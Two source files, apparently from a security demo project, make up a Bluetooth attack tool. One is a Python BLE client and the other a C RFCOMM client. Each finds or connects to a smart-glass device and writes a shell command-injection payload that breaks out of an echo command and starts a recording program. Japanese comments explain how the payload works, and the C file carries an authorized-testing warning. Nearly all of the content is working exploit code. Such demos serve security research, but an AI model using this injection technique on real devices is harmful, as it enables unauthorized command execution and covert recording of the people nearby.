File: Show_notification/attacker.py
import asyncio
import sys
from bleak import BleakScanner, BleakClient

# --- 設定（被害者側と同じUUIDにする必要があります） ---
TARGET_NAME = "SmartGlass_Demo"
# 書き込み先のCharacteristic UUID (末尾 f1)
CHAR_UUID   = '12345678-1234-5678-1234-56789abcdef1'

# --- 攻撃ペイロードの作成 ---
# 解説:
# 1. ";  -> 前のコマンド(echo)を強制終了
# 2. python3 /home/pi/start_rec.py  -> 録画プログラムを実行
# 3. #   -> 以降の文字列（元のコードの閉じカッコなど）をコメントアウトして無効化
# ※ バックスラッシュなどは使わず、シンプルにOSコマンドの構文を突きます
PAYLOAD = 'Hello"; python3 /home/matsumoto/bt_attack/Selfmade_smartglass/Recording_app/start_rec; #'

async def main():
    print("-" * 50)
    print("💀 Bluetooth 攻撃ツール (Command Injector) 起動")
    print("-" * 50)

    # 1. スキャン (ターゲットの検索)
    print(f"[*] ターゲット '{TARGET_NAME}' を捜索中...")
    device = await BleakScanner.find_device_by_filter(
        lambda d, ad: d.name and TARGET_NAME in d.name
    )

    if not device:
        print(f"[!] ターゲットが見つかりませんでした。被害者側のサーバーは起動していますか？")
        return

    print(f"[+] 発見しました: {device.name} ({device.address})")

    # 2. 接続 & 攻撃
    print(f"[*] 接続を試行中...")
    try:
        async with BleakClient(device) as client:
            print(f"[+] 接続成功！ (Connected)")

            # ペアリングが必要な場合、OSレベルで自動処理されるか、Just Worksならスルーされます
            
            print(f"[*] 悪意あるペイロードを生成中: {PAYLOAD}")
            print(f"[*] データを送信中 (Injecting)...")

            # バイト列に変換して書き込み (Write Request)
            await client.write_gatt_char(CHAR_UUID, PAYLOAD.encode('utf-8'))

            print(f"[+] 送信完了！ 攻撃が実行されたはずです。")
            print(f"[*] 切断します。")

    except Exception as e:
        print(f"[!] エラーが発生しました: {e}")

if __name__ == "__main__":
    try:
        asyncio.run(main())
    except KeyboardInterrupt:
        print("\n中止しました。")

File: Show_notification/attacker.c
/*
 * Bluetooth Classic RFCOMM Command Injection Attack Tool
 * 
 * WARNING: This tool is for AUTHORIZED SECURITY TESTING ONLY
 * - Only use on systems you own or have explicit permission to test
 * - Unauthorized access to devices is illegal
 * - This is for vulnerability research and educational purposes
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <unistd.h>
#include <sys/socket.h>
#include <bluetooth/bluetooth.h>
#include <bluetooth/rfcomm.h>

#define RFCOMM_CHANNEL 1

/* Attack payload */
#define PAYLOAD "Hello\"; python3 /home/matsumoto/bt_attack/Selfmade_smartglass/Recording_app/start_rec; #"

void print_banner(void) {
    printf("--------------------------------------------------\n");
    printf("💀 Bluetooth 攻撃ツール (Command Injector) 起動\n");
    printf("--------------------------------------------------\n");
    printf("警告: このツールは承認されたテスト環境でのみ使用してください\n");
    printf("--------------------------------------------------\n");
}

void log_info(const char *format, ...) {
    va_list args;
    va_start(args, format);
    printf("[*] ");
    vprintf(format, args);
    printf("\n");
    va_end(args);
}

void log_success(const char *format, ...) {
    va_list args;
    va_start(args, format);
    printf("[+] ");
    vprintf(format, args);
    printf("\n");
    va_end(args);
}

void log_error(const char *format, ...) {
    va_list args;
    va_start(args, format);
    printf("[!] ");
    vprintf(format, args);
    printf("\n");
    va_end(args);
}

int main(int argc, char *argv[]) {
    int sock;
    struct sockaddr_rc addr = {0};
    
    print_banner();
    
    /* 引数チェック */
    if (argc != 2) {
        printf("使用方法: %s <BDアドレス>\n", argv[0]);
        printf("例: %s B8:27:EB:XX:XX:XX\n", argv[0]);
        printf("\nBDアドレスの取得方法:\n");
        printf("  被害者側で: hciconfig\n");
        return 1;
    }
    
    const char *target_bdaddr = argv[1];
    
    /* RFCOMMソケットの作成 */
    sock = socket(AF_BLUETOOTH, SOCK_STREAM, BTPROTO_RFCOMM);
    if (sock < 0) {
        log_error("ソケット作成エラー");
        perror("socket");
        return 1;
    }
    
    /* 接続先アドレスの設定 */
    addr.rc_family = AF_BLUETOOTH;
    addr.rc_channel = RFCOMM_CHANNEL;
    
    if (str2ba(target_bdaddr, &addr.rc_bdaddr) < 0) {
        log_error("無効なBDアドレス: %s", target_bdaddr);
        close(sock);
        return 1;
    }
    
    log_info("ターゲット %s (チャンネル %d) に接続を試行中...", 
             target_bdaddr, RFCOMM_CHANNEL);
    
    /* 接続 */
    if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        log_error("接続エラー");
        perror("connect");
        close(sock);
        return 1;
    }
    
    log_success("接続成功！ (Connected)");
    
    /* 攻撃ペイロードの送信 */
    log_info("悪意あるペイロードを生成中: %s", PAYLOAD);
    log_info("データを送信中 (Injecting)...");
    
    ssize_t bytes_written = write(sock, PAYLOAD, strlen(PAYLOAD));
    
    if (bytes_written < 0) {
        log_error("送信エラー");
        perror("write");
        close(sock);
        return 1;
    }
    
    log_success("送信完了！ 攻撃が実行されたはずです。");
    log_info("切断します。");
    
    /* ソケットを閉じる */
    close(sock);
    
    return 0;
}